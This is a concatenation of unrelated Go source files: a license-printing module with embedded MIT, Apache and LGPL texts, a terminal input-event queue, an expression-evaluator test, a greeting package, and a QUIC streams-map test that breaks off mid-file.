this software and associated documentation files (the "Software"), to deal in
the Software without restriction, including without limitation the rights to
use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
the Software, and to permit persons to whom the Software is furnished to do so,
subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
*/
package main
import (
"fmt"
)
func showLicenses() {
fmt.Println("FLOSS Licenses")
fmt.Println("----------------------------------------------------------------")
fmt.Println(allLicenseText)
}
var allLicenseText = `anaconda Copyright (c) 2013 Aditya Mukerjee, Quotidian Ventures
https://github.com/ChimeraCoder/anaconda
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files(the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE
----------------------------------------------------------------
Go-OAuth Copyright (c) 2010 Gary Burd
https://github.com/garyburd/go-oauth
Apache License
Version 2.0, January 2004
http://www.apache.org/licenses/
TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
1. Definitions.
"License" shall mean the terms and conditions for use, reproduction, and distribution as defined by Sections 1 through 9 of this document.
"Licensor" shall mean the copyright owner or entity authorized by the copyright owner that is granting the License.
"Legal Entity" shall mean the union of the acting entity and all other entities that control, are controlled by, or are under common control with that entity. For the purposes of this definition, "control" means (i) the power, direct or indirect, to cause the direction or management of such entity, whether by contract or otherwise, or (ii) ownership of fifty percent (50%) or more of the outstanding shares, or (iii) beneficial ownership of such entity.
"You" (or "Your") shall mean an individual or Legal Entity exercising permissions granted by this License.
"Source" form shall mean the preferred form for making modifications, including but not limited to software source code, documentation source, and configuration files.
"Object" form shall mean any form resulting from mechanical transformation or translation of a Source form, including but not limited to compiled object code, generated documentation, and conversions to other media types.
"Work" shall mean the work of authorship, whether in Source or Object form, made available under the License, as indicated by a copyright notice that is included in or attached to the work (an example is provided in the Appendix below).
"Derivative Works" shall mean any work, whether in Source or Object form, that is based on (or derived from) the Work and for which the editorial revisions, annotations, elaborations, or other modifications represent, as a whole, an original work of authorship. For the purposes of this License, Derivative Works shall not include works that remain separable from, or merely link (or bind by name) to the interfaces of, the Work and Derivative Works thereof.
"Contribution" shall mean any work of authorship, including the original version of the Work and any modifications or additions to that Work or Derivative Works thereof, that is intentionally submitted to Licensor for inclusion in the Work by the copyright owner or by an individual or Legal Entity authorized to submit on behalf of the copyright owner. For the purposes of this definition, "submitted" means any form of electronic, verbal, or written communication sent to the Licensor or its representatives, including but not limited to communication on electronic mailing lists, source code control systems, and issue tracking systems that are managed by, or on behalf of, the Licensor for the purpose of discussing and improving the Work, but excluding communication that is conspicuously marked or otherwise designated in writing by the copyright owner as "Not a Contribution."
"Contributor" shall mean Licensor and any individual or Legal Entity on behalf of whom a Contribution has been received by Licensor and subsequently incorporated within the Work.
2. Grant of Copyright License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare Derivative Works of, publicly display, publicly perform, sublicense, and distribute the Work and such Derivative Works in Source or Object form.
3. Grant of Patent License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable (except as stated in this section) patent license to make, have made, use, offer to sell, sell, import, and otherwise transfer the Work, where such license applies only to those patent claims licensable by such Contributor that are necessarily infringed by their Contribution(s) alone or by combination of their Contribution(s) with the Work to which such Contribution(s) was submitted. If You institute patent litigation against any entity (including a cross-claim or counterclaim in a lawsuit) alleging that the Work or a Contribution incorporated within the Work constitutes direct or contributory patent infringement, then any patent licenses granted to You under this License for that Work shall terminate as of the date such litigation is filed.
4. Redistribution. You may reproduce and distribute copies of the Work or Derivative Works thereof in any medium, with or without modifications, and in Source or Object form, provided that You meet the following conditions:
You must give any other recipients of the Work or Derivative Works a copy of this License; and
You must cause any modified files to carry prominent notices stating that You changed the files; and
You must retain, in the Source form of any Derivative Works that You distribute, all copyright, patent, trademark, and attribution notices from the Source form of the Work, excluding those notices that do not pertain to any part of the Derivative Works; and
If the Work includes a "NOTICE" text file as part of its distribution, then any Derivative Works that You distribute must include a readable copy of the attribution notices contained within such NOTICE file, excluding those notices that do not pertain to any part of the Derivative Works, in at least one of the following places: within a NOTICE text file distributed as part of the Derivative Works; within the Source form or documentation, if provided along with the Derivative Works; or, within a display generated by the Derivative Works, if and wherever such third-party notices normally appear. The contents of the NOTICE file are for informational purposes only and do not modify the License. You may add Your own attribution notices within Derivative Works that You distribute, alongside or as an addendum to the NOTICE text from the Work, provided that such additional attribution notices cannot be construed as modifying the License.
You may add Your own copyright statement to Your modifications and may provide additional or different license terms and conditions for use, reproduction, or distribution of Your modifications, or for any such Derivative Works as a whole, provided Your use, reproduction, and distribution of the Work otherwise complies with the conditions stated in this License.
5. Submission of Contributions. Unless You explicitly state otherwise, any Contribution intentionally submitted for inclusion in the Work by You to the Licensor shall be under the terms and conditions of this License, without any additional terms or conditions. Notwithstanding the above, nothing herein shall supersede or modify the terms of any separate license agreement you may have executed with Licensor regarding such Contributions.
6. Trademarks. This License does not grant permission to use the trade names, trademarks, service marks, or product names of the Licensor, except as required for reasonable and customary use in describing the origin of the Work and reproducing the content of the NOTICE file.
7. Disclaimer of Warranty. Unless required by applicable law or agreed to in writing, Licensor provides the Work (and each Contributor provides its Contributions) on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied, including, without limitation, any warranties or conditions of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A PARTICULAR PURPOSE. You are solely responsible for determining the appropriateness of using or redistributing the Work and assume any risks associated with Your exercise of permissions under this License.
8. Limitation of Liability. In no event and under no legal theory, whether in tort (including negligence), contract, or otherwise, unless required by applicable law (such as deliberate and grossly negligent acts) or agreed to in writing, shall any Contributor be liable to You for damages, including any direct, indirect, special, incidental, or consequential damages of any character arising as a result of this License or out of the use or inability to use the Work (including but not limited to damages for loss of goodwill, work stoppage, computer failure or malfunction, or any and all other commercial damages or losses), even if such Contributor has been advised of the possibility of such damages.
9. Accepting Warranty or Additional Liability. While redistributing the Work or Derivative Works thereof, You may choose to offer, and charge a fee for, acceptance of support, warranty, indemnity, or other liability obligations and/or rights consistent with this License. However, in accepting such obligations, You may act only on Your own behalf and on Your sole responsibility, not on behalf of any other Contributor, and only if You agree to indemnify, defend, and hold each Contributor harmless for any liability incurred by, or claims asserted against, such Contributor by reason of your accepting any such warranty or additional liability.
END OF TERMS AND CONDITIONS
----------------------------------------------------------------
tokenbucket Copyright (c) ChimeraCoder
https://github.com/ChimeraCoder/tokenbucket
GNU LESSER GENERAL PUBLIC LICENSE
Version 3, 29 June 2007
Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/>
Everyone is permitted to copy and distribute verbatim copies
of this license document, but changing it is not allowed.
This version of the GNU Lesser General Public License incorporates
the terms and conditions of version 3 of the GNU General Public
License, supplemented by the additional permissions listed below.
0. Additional Definitions.
As used herein, "this License" refers to version 3 of the GNU Lesser
General Public License, and the "GNU GPL" refers to version 3 of the GNU
General Public License.
"The Library" refers to a covered work governed by this License,
other than an Application or a Combined Work as defined below.
An "Application" is any work that makes use of an interface provided
by the Library, but which is not otherwise based on the Library.
Defining a subclass of a class defined by the Library is deemed a mode
of using an interface provided by the Library.
A "Combined Work" is a work produced by combining or linking an
Application with the Library. The particular version of the Library
with which the Combined Work was made is also called the "Linked
Version".
The "Minimal Corresponding Source" for a Combined Work means the
Corresponding Source for the Combined Work, excluding any source code
for portions of the Combined Work that, considered in isolation, are
based on the Application, and not on the Linked Version.
The "Corresponding Application Code" for a Combined Work means the
object code and/or source code for the Application, including any data
and utility programs needed for reproducing the Combined Work from the
Application, but excluding the System Libraries of the Combined Work.
1. Exception to Section 3 of the GNU GPL.
You may convey a covered work under sections 3 and 4 of this License
without being bound by section 3 of the GNU GPL.
2. Conveying Modified Versions.
If you modify a copy of the Library, and, in your modifications, a
facility refers to a function or data to be supplied by an Application
that uses the facility (other than as an argument passed when the
facility is invoked), then you may convey a copy of the modified
version:
a) under this License, provided that you make a good faith effort to
ensure that, in the event an Application does not supply the
function or data, the facility still operates, and performs
whatever part of its purpose remains meaningful, or
b) under the GNU GPL, with none of the additional permissions of
this License applicable to that copy.
3. Object Code Incorporating Material from Library Header Files.
The object code form of an Application may incorporate material from
a header file that is part of the Library. You may convey such object
code under terms of your choice, provided that, if the incorporated
material is not limited to numerical parameters, data structure
layouts and accessors, or small macros, inline functions and templates
(ten or fewer lines in length), you do both of the following:
a) Give prominent notice with each copy of the object code that the
Library is used in it and that the Library and its use are
covered by this License.
b) Accompany the object code with a copy of the GNU GPL and this license
document.
4. Combined Works.
You may convey a Combined Work under terms of your choice that,
taken together, effectively do not restrict modification of the
portions of the Library contained in the Combined Work and reverse
engineering for debugging such modifications, if you also do each of
the following:
a) Give prominent notice with each copy of the Combined Work that
the Library is used in it and that the Library and its use are
covered by this License.
b) Accompany the Combined Work with a copy of the GNU GPL and this license
document.
c) For a Combined Work that displays copyright notices during
execution, include the copyright notice for the Library among
these notices, as well as a reference directing the user to the
copies of the GNU GPL and this license document.
d) Do one of the following:
0) Convey the Minimal Corresponding Source under the terms of this
License, and the Corresponding Application Code in a form
suitable for, and under terms that permit, the user to
recombine or relink the Application with a modified version of
the Linked Version to produce a modified Combined Work, in the
manner specified by section 6 of the GNU GPL for conveying
Corresponding Source.
1) Use a suitable shared library mechanism for linking with the
Library. A suitable mechanism is one that (a) uses at run time
a copy of the Library already present on the user's computer
system, and (b) will operate properly with a modified version
of the Library that is interface-compatible with the Linked
Version.
e) Provide Installation Information, but only if you would otherwise
be required to provide such information under section 6 of the
GNU GPL, and only to the extent that such information is
necessary to install and execute a modified version of the
Combined Work produced by recombining or relinking the
Application with a modified version of the Linked Version. (If
you use option 4d0, the Installation Information must accompany
the Minimal Corresponding Source and Corresponding Application
Code. If you use option 4d1, you must provide the Installation
Information in the manner specified by section 6 of the GNU GPL
for conveying Corresponding Source.)
5. Combined Libraries.
You may place library facilities that are a work based on the
Library side by side in a single library together with other library
facilities that are not Applications and are not covered by this
License, and convey such a combined library under terms of your
choice, if you do both of the following:
a) Accompany the combined library with a copy of the same work based
on the Library, uncombined with any other library facilities,
conveyed under the terms of this License.
b) Give prominent notice with the combined library that part of it
is a work based on the Library, and explaining where to find the
accompanying uncombined form of the same work.
6. Revised Versions of the GNU Lesser General Public License.
The Free Software Foundation may publish revised and/or new versions
of the GNU Lesser General Public License from time to time. Such new
versions will be similar in spirit to the present version, but may
differ in detail to address new problems or concerns.
Each version is given a distinguishing version number. If the
Library as you received it specifies that a certain numbered version
of the GNU Lesser General Public License "or any later version"
applies to it, you have the option of following the terms and
conditions either of that published version or of any later version
published by the Free Software Foundation. If the Library as you
received it does not specify a version number of the GNU Lesser
General Public License, you may choose any version of the GNU Lesser
General Public License ever published by the Free Software Foundation.
If the Library as you received it specifies that a proxy can decide
whether future versions of the GNU Lesser General Public License shall
apply, that proxy's public statement of acceptance of any version is
permanent authorization for you to choose that version for the
Library.
----------------------------------------------------------------
go-yaml
gopkg.in/yaml.v2
Copyright (c) 2011-2014 - Canonical Inc.
This software is licensed under the LGPLv3, included below.
As a special exception to the GNU Lesser General Public License version 3
("LGPL3"), the copyright holders of this Library give you permission to
convey to a third party a Combined Work that links statically or dynamically
to this Library without providing any Minimal Corresponding Source or
Minimal Application Code as set out in 4d or providing the installation
information set out in section 4e, provided that you comply with the other
provisions of LGPL3 and provided that you meet, for the Application the
terms and conditions of the license(s) which apply to the Application.
Except as stated in this special exception, the provisions of LGPL3 will
continue to comply in full to this Library. If you modify this Library, you
may apply this exception to your version of this Library, but you are not
obliged to do so. If you do not wish to do so, delete this exception
statement from your version. This exception does not (and cannot) modify any
license terms which apply to the Application, with which you must still
comply.
GNU LESSER GENERAL PUBLIC LICENSE
Version 3, 29 June 2007
Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/>
Everyone is permitted to copy and distribute verbatim copies
of this license document, but changing it is not allowed.
This version of the GNU Lesser General Public License incorporates
the terms and conditions of version 3 of the GNU General Public
License, supplemented by the additional permissions listed below.
0. Additional Definitions.
As used herein, "this License" refers to version 3 of the GNU Lesser
General Public License, and the "GNU GPL" refers to version 3 of the GNU
General Public License.
"The Library" refers to a covered work governed by this License,
other than an Application or a Combined Work as defined below.
An "Application" is any work that makes use of an interface provided
by the Library, but which is not otherwise based on the Library.
Defining a subclass of a class defined by the Library is deemed a mode
of using an interface provided by the Library.
A "Combined Work" is a work produced by combining or linking an
Application with the Library. The particular version of the Library
with which the Combined Work was made is also called the "Linked
Version".
The "Minimal Corresponding Source" for a Combined Work means the
Corresponding Source for the Combined Work, excluding any source code
for portions of the Combined Work that, considered in isolation, are
based on the Application, and not on the Linked Version.
The "Corresponding Application Code" for a Combined Work means the
object code and/or source code for the Application, including any data
and utility programs needed for reproducing the Combined Work from the
Application, but excluding the System Libraries of the Combined Work.
1. Exception to Section 3 of the GNU GPL.
You may convey a covered work under sections 3 and 4 of this License
without being bound by section 3 of the GNU GPL.
2. Conveying Modified Versions.
If you modify a copy of the Library, and, in your modifications, a
facility refers to a function or data to be supplied by an Application
that uses the facility (other than as an argument passed when the
facility is invoked), then you may convey a copy of the modified
version:
a) under this License, provided that you make a good faith effort to
ensure that, in the event an Application does not supply the
function or data, the facility still operates, and performs
whatever part of its purpose remains meaningful, or
b) under the GNU GPL, with none of the additional permissions of
this License applicable to that copy.
3. Object Code Incorporating Material from Library Header Files.
The object code form of an Application may incorporate material from
a header file that is part of the Library. You may convey such object
code under terms of your choice, provided that, if the incorporated
material is not limited to numerical parameters, data structure
layouts and accessors, or small macros, inline functions and templates
(ten or fewer lines in length), you do both of the following:
a) Give prominent notice with each copy of the object code that the
Library is used in it and that the Library and its use are
covered by this License.
b) Accompany the object code with a copy of the GNU GPL and this license
document.
4. Combined Works.
You may convey a Combined Work under terms of your choice that,
taken together, effectively do not restrict modification of the
portions of the Library contained in the Combined Work and reverse
engineering for debugging such modifications, if you also do each of
the following:
a) Give prominent notice with each copy of the Combined Work that
the Library is used in it and that the Library and its use are
covered by this License.
b) Accompany the Combined Work with a copy of the GNU GPL and this license
document.
c) For a Combined Work that displays copyright notices during
execution, include the copyright notice for the Library among
these notices, as well as a reference directing the user to the
copies of the GNU GPL and this license document.
d) Do one of the following:
0) Convey the Minimal Corresponding Source under the terms of this
License, and the Corresponding Application Code in a form
suitable for, and under terms that permit, the user to
recombine or relink the Application with a modified version of
the Linked Version to produce a modified Combined Work, in the
manner specified by section 6 of the GNU GPL for conveying
Corresponding Source.
1) Use a suitable shared library mechanism for linking with the
Library. A suitable mechanism is one that (a) uses at run time
a copy of the Library already present on the user's computer
system, and (b) will operate properly with a modified version
of the Library that is interface-compatible with the Linked
Version.
e) Provide Installation Information, but only if you would otherwise
be required to provide such information under section 6 of the
GNU GPL, and only to the extent that such information is
necessary to install and execute a modified version of the
Combined Work produced by recombining or relinking the
Application with a modified version of the Linked Version. (If
you use option 4d0, the Installation Information must accompany
the Minimal Corresponding Source and Corresponding Application
Code. If you use option 4d1, you must provide the Installation
Information in the manner specified by section 6 of the GNU GPL
for conveying Corresponding Source.)
5. Combined Libraries.
You may place library facilities that are a work based on the
Library side by side in a single library together with other library
facilities that are not Applications and are not covered by this
License, and convey such a combined library under terms of your
choice, if you do both of the following:
a) Accompany the combined library with a copy of the same work based
on the Library, uncombined with any other library facilities,
conveyed under the terms of this License.
b) Give prominent notice with the combined library that part of it
is a work based on the Library, and explaining where to find the
accompanying uncombined form of the same work.
6. Revised Versions of the GNU Lesser General Public License.
The Free Software Foundation may publish revised and/or new versions
of the GNU Lesser General Public License from time to time. Such new
versions will be similar in spirit to the present version, but may
differ in detail to address new problems or concerns.
Each version is given a distinguishing version number. If the
Library as you received it specifies that a certain numbered version
of the GNU Lesser General Public License "or any later version"
applies to it, you have the option of following the terms and
conditions either of that published version or of any later version
published by the Free Software Foundation. If the Library as you
received it does not specify a version number of the GNU Lesser
General Public License, you may choose any version of the GNU Lesser
General Public License ever published by the Free Software Foundation.
If the Library as you received it specifies that a proxy can decide
whether future versions of the GNU Lesser General Public License shall
apply, that proxy's public statement of acceptance of any version is
permanent authorization for you to choose that version for the
Library.`
|
package platform
import (
"fmt"
"image"
"log"
"unicode/utf8"
"github.com/jcorbin/anansi"
"github.com/jcorbin/anansi/ansi"
)
// Events holds a queue of input events that were available at the start of the
// current frame's time window.
type Events struct {
Type []EventType
esc []ansi.Escape
arg [][]byte
mouse []Mouse
}
// EventType is the type of an entry in Events.
type EventType uint8
// Type constants for Events.
const (
EventNone EventType = iota
EventEscape
EventRune
EventMouse
)
// Escape represents ansi escape sequence data stored in an Events queue.
type Escape struct {
ID ansi.Escape
Arg []byte
}
// Mouse represents mouse data stored in an Events queue.
type Mouse struct {
State ansi.MouseState
ansi.Point
}
// ZM is a convenience name for the zero value of Mouse.
var ZM Mouse
// Empty returns true if there are non-EventNone typed events left.
func (es *Events) Empty() bool {
for i := 0; i < len(es.Type); i++ {
if es.Type[i] != EventNone {
return false
}
}
return true
}
// HasTerminal returns true if the given terminal rune is in the event queue,
// striking it and truncating any events after it.
func (es *Events) HasTerminal(r rune) bool {
for i := 0; i < len(es.Type); i++ {
if es.Type[i] == EventRune && es.esc[i] == ansi.Escape(r) {
for ; i < len(es.Type); i++ {
es.Type[i] = EventNone
}
return true
}
}
return false
}
// CountRune counts occurrences of any of the given runes, striking them out.
func (es *Events) CountRune(rs ...rune) (n int) {
for i := 0; i < len(es.Type); i++ {
if es.Type[i] != EventRune {
continue
}
for _, r := range rs {
if es.esc[i] == ansi.Escape(r) {
es.Type[i] = EventNone
n++
}
}
}
return n
}
// CountPressesIn counts mouse presses of the given button within the given
// rectangle, striking them out.
func (es *Events) CountPressesIn(box ansi.Rectangle, buttonID uint8) (n int) {
for id, kind := range es.Type {
if kind == EventMouse {
if sid, pressed := es.mouse[id].State.IsPress(); pressed && sid == buttonID {
if es.mouse[id].Point.In(box) {
n++
es.Type[id] = EventNone
}
}
}
}
return n
}
// AnyPressesOutside returns true if there are any mouse presses outside the
// given rectangle.
func (es *Events) AnyPressesOutside(box ansi.Rectangle) bool {
for id, kind := range es.Type {
if kind == EventMouse {
if _, pressed := es.mouse[id].State.IsPress(); pressed {
if !es.mouse[id].Point.In(box) {
return true
}
}
}
}
return false
}
// TotalScrollIn counts total mouse scroll delta within the given rectangle,
// striking out all such events.
func (es *Events) TotalScrollIn(box ansi.Rectangle) (n int) {
for id, kind := range es.Type {
if kind == EventMouse && es.mouse[id].Point.In(box) {
switch es.mouse[id].State.ButtonID() {
case 4: // wheel-up
n--
es.Type[id] = EventNone
case 5: // wheel-down
n++
es.Type[id] = EventNone
}
}
}
return n
}
// TotalCursorMovement returns the total cursor movement delta (e.g. from arrow
// keys) striking out all such cursor movement events. Does not recognize
// cursor line movements (CNL and CPL).
func (es *Events) TotalCursorMovement() (move image.Point) {
for id, kind := range es.Type {
if kind == EventEscape {
if d, isMove := ansi.DecodeCursorCardinal(es.esc[id], es.arg[id]); isMove {
move = move.Add(d)
es.Type[id] = EventNone
}
}
}
return move
}
// LastMouse returns the last mouse event, striking all mouse events out
// (including the last!) only if consume is true.
func (es *Events) LastMouse(consume bool) (m Mouse, have bool) {
for id, kind := range es.Type {
if kind == EventMouse {
m = es.mouse[id]
have = true
if consume {
es.Type[id] = EventNone
}
}
}
return m, have
}
func (e Escape) String() string { return fmt.Sprintf("%v %s", e.ID, e.Arg) }
func (m Mouse) String() string { return fmt.Sprintf("%v@%v", m.State, m.Point) }
// Escape returns any ansi escape sequence data for the given event id.
func (es *Events) Escape(id int) Escape { return Escape{es.esc[id], es.arg[id]} }
// Mouse returns any mouse event data for the given event id.
func (es *Events) Mouse(id int) Mouse { return es.mouse[id] }
// Rune returns the event's rune (maybe an ansi.Escape PUA range rune).
func (es *Events) Rune(id int) rune { return rune(es.esc[id]) }
// Clear the event queue.
func (es *Events) Clear() {
es.Type = es.Type[:0]
es.esc = es.esc[:0]
es.arg = es.arg[:0]
es.mouse = es.mouse[:0]
}
// DecodeBytes parses from the given byte slice; useful for replays and testing.
func (es *Events) DecodeBytes(b []byte) {
for len(b) > 0 {
e, a, n := ansi.DecodeEscape(b)
b = b[n:]
if e == 0 {
r, n := utf8.DecodeRune(b)
b = b[n:]
e = ansi.Escape(r)
}
es.add(e, a)
}
}
// DecodeInput decodes all input currently read into the given input.
func (es *Events) DecodeInput(in *anansi.Input) {
for e, a, ok := in.Decode(); ok; e, a, ok = in.Decode() {
es.add(e, a)
}
}
func (es *Events) add(e ansi.Escape, a []byte) {
kind := EventEscape
m := Mouse{}
if !e.IsEscape() {
kind = EventRune
}
switch e {
case ansi.CSI('M'), ansi.CSI('m'):
var err error
if m.State, m.Point, err = ansi.DecodeXtermExtendedMouse(e, a); err != nil {
log.Printf("mouse control: decode error %v %s : %v", e, a, err)
} else if m.State != 0 || m.Point.Valid() {
kind = EventMouse
}
}
es.Type = append(es.Type, kind)
es.esc = append(es.esc, e)
es.arg = append(es.arg, a)
es.mouse = append(es.mouse, m)
}
|
/*
* Copyright 2017 StreamSets Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package el
import (
"fmt"
"strings"
"testing"
)
type EvaluationTest struct {
Name string
Expression string
Parameters map[string]interface{}
Expected interface{}
ErrorCase bool
}
func TestSimpleExpression(test *testing.T) {
evaluationTests := []EvaluationTest{
{
Name: "Test empty expression",
Expression: "",
Expected: "",
},
{
Name: "Test string value",
Expression: "'sample'",
Expected: "sample",
},
{
Name: "Test number value",
Expression: "10",
Expected: float64(10),
},
{
Name: "Test Parameter",
Expression: "${PARAM1 > PARAM2}",
Parameters: map[string]interface{}{
"PARAM1": 10,
"PARAM2": 20,
},
Expected: false,
},
{
Name: "Test Invalid expresion",
Expression: "${PARAM1 > PARAM2}",
Expected: "No parameter 'PARAM1' found",
ErrorCase: true,
},
{
Name: "Test invalid expression",
Expression: "( 10 > 5",
Expected: "Unbalanced parenthesis",
ErrorCase: true,
},
}
RunEvaluationTests(evaluationTests, nil, test)
}
func RunEvaluationTests(evaluationTests []EvaluationTest, definitionsList []Definitions, test *testing.T) {
fmt.Printf("Running %d evaluation test cases...\n", len(evaluationTests))
for _, evaluationTest := range evaluationTests {
evaluator, _ := NewEvaluator(
evaluationTest.Name,
evaluationTest.Parameters,
definitionsList,
)
result, err := evaluator.Evaluate(evaluationTest.Expression)
if err != nil {
if evaluationTest.ErrorCase {
if !strings.Contains(err.Error(), evaluationTest.Expected.(string)) {
test.Logf("Test '%s' failed", evaluationTest.Name)
test.Logf("Evaluation error '%v' does not match expected: '%v'", err.Error(),
evaluationTest.Expected)
test.Fail()
}
} else {
test.Logf("Test '%s' failed", evaluationTest.Name)
test.Logf("Encountered error: %s", err.Error())
test.Fail()
}
continue
}
if result != evaluationTest.Expected {
test.Logf("Test '%s' failed", evaluationTest.Name)
test.Logf("Evaluation result '%v' does not match expected: '%v'", result, evaluationTest.Expected)
test.Fail()
}
}
}
|
package greet
import "fmt"
func SayHello() {
fmt.Println("Hello !")
}
func Greet(name string) string {
return fmt.Sprintf("Hello %s", name)
}
|
package quic
import (
"errors"
"github.com/golang/mock/gomock"
. "github.com/onsi/ginkgo"
. "github.com/onsi/gomega"
"gx/ipfs/QmU44KWVkSHno7sNDTeUcL4FBgxgoidkFuTUyTXWJPXXFJ/quic-go/internal/protocol"
"gx/ipfs/QmU44KWVkSHno7sNDTeUcL4FBgxgoidkFuTUyTXWJPXXFJ/quic-go/internal/wire"
"gx/ipfs/QmU44KWVkSHno7sNDTeUcL4FBgxgoidkFuTUyTXWJPXXFJ/quic-go/qerr"
)
var _ = Describe("Streams Map (outgoing)", func() {
const firstNewStream protocol.StreamID = 10
var (
m *outgoingItemsMap
newItem func(id protocol.StreamID) item
mockSender *MockStreamSender
)
BeforeEach(func() {
newItem = func(id protocol.StreamID) item {
return &mockGenericStream{id: id}
}
mockSender = NewMockStreamSender(mockCtrl)
m = newOutgoingItemsMap(firstNewStream, newItem, mockSender.queueControlFrame)
})
Context("no stream ID limit", func() {
BeforeEach(func() {
m.SetMaxStream(0xffffffff)
})
It("opens streams", func() {
str, err := m.OpenStream()
Expect(err).ToNot(HaveOccurred())
Expect(str.(*mockGenericStream).id).To(Equal(firstNewStream))
str, err = m.OpenStream()
Expect(err).ToNot(HaveOccurred())
Expect(str.(*mockGenericStream).id).To(Equal(firstNewStream + 4))
})
It("doesn't open streams after it has been closed", func() {
testErr := errors.New("close")
m.CloseWithError(testErr)
_, err := m.OpenStream()
Expect(err).To(MatchError(testErr))
})
It("gets streams", func() {
_, err := m.OpenStream()
Expect(err).ToNot(HaveOccurred())
str, err := m.GetStream(firstNewStream)
Expect(err).ToNot(HaveOccurred())
Expect(str.(*mockGenericStream).id).To(Equal(firstNewStream))
})
It("errors when trying to get a stream that has not yet been opened", func() {
_, err := m.GetStream(10)
Expect(err).To(MatchError(qerr.Error(qerr.InvalidStreamID, "peer attempted to open stream 10")))
})
It("deletes streams", func() {
_, err := m.OpenStream() // opens stream 10
Expect(err).ToNot(HaveOccurred())
err = m.DeleteStream(10)
Expect(err).ToNot(HaveOccurred())
str, err := m.GetStream(10)
Expect(err).ToNot(HaveOccurred())
Expect(str).To(BeNil())
})
It("errors when deleting a non-existing stream", func() {
err := m.DeleteStream(1337)
Expect(err).To(MatchError("Tried to delete unknown stream 1337"))
})
It("errors when deleting a stream twice", func() {
_, err := m.OpenStream() // opens stream 10
Expect(err).ToNot(HaveOccurred())
err = m.DeleteStream(10)
Expect(err).ToNot(HaveOccurred())
err = m.DeleteStream(10)
Expect(err).To(MatchError("Tried to delete unknown stream 10"))
})
It("closes all streams when CloseWithError is called", func() {
str1, err := m.OpenStream()
Expect(err).ToNot(HaveOccurred())
str2, err := m.OpenStream()
Expect(err).ToNot(HaveOccurred())
testErr := errors.New("test err")
m.CloseWithError(testErr)
Expect(str1.(*mockGenericStream).closed).To(BeTrue())
Expect(str1.(*mockGenericStream).closeErr).To(MatchError(testErr))
Expect(str2.(*mockGenericStream).closed).To(BeTrue())
Expect(str2.(*mockGenericStream).closeErr).To(MatchError(testErr))
})
})
Context("with stream ID limits", func() {
It("errors when no stream can be opened immediately", func() {
mockSender.EXPECT().queueControlFrame(gomock.Any())
_, err := m.OpenStream()
Expect(err).To(MatchError(qerr.TooManyOpenStreams))
})
It("blocks until a stream can be opened synchronously", func() {
mockSender.EXPECT().queueControlFrame(gomock.Any())
done := make(chan struct{})
go func() {
defer GinkgoRecover()
str, err := m.OpenStreamSync()
Expect(err).ToNot(HaveOccurred())
Expect(str.(*mockGenericStream).id).To(Equal(firstNewStream))
close(done)
}()
Consistently(done).ShouldNot(BeClosed())
m.SetMaxStream(firstNewStream)
Eventually(done).Should(BeClosed())
})
It("stops opening synchronously when it is closed", func() {
mockSender.EXPECT().queueControlFrame(gomock.Any())
testErr := errors.New("test error")
done := make(chan struct{})
go func() {
defer GinkgoRecover()
_, err := m.OpenStreamSync()
Expect(err).To(MatchError(testErr))
close(done)
}()
Consistently(done).ShouldNot(BeClosed())
m.CloseWithError(testErr)
Eventually(done).Should(BeClosed())
})
It("doesn't reduce the stream limit", func() {
m.SetMaxStream(firstNewStream)
m.SetMaxStream(firstNewStream - 4)
str, err := m.OpenStream()
Expect(err).ToNot(HaveOccurred())
Expect(str.(*mockGenericStream).id).To(Equal(firstNewStream))
})
It("queues a STREAM_ID_BLOCKED frame if no stream can be opened", func() {
m.SetMaxStream(firstNewStream)
mockSender.EXPECT().queueControlFrame(&wire.StreamIDBlockedFrame{StreamID: firstNewStream})
_, err := m.OpenStream()
Expect(err).ToNot(HaveOccurred())
_, err = m.OpenStream()
Expect(err).To(MatchError(qerr.TooManyOpenStreams))
})
It("only sends one STREAM_ID_BLOCKED frame for one stream ID", func() {
m.SetMaxStream(firstNewStream)
mockSender.EXPECT().queueControlFrame(&wire.StreamIDBlockedFrame{StreamID: firstNewStream})
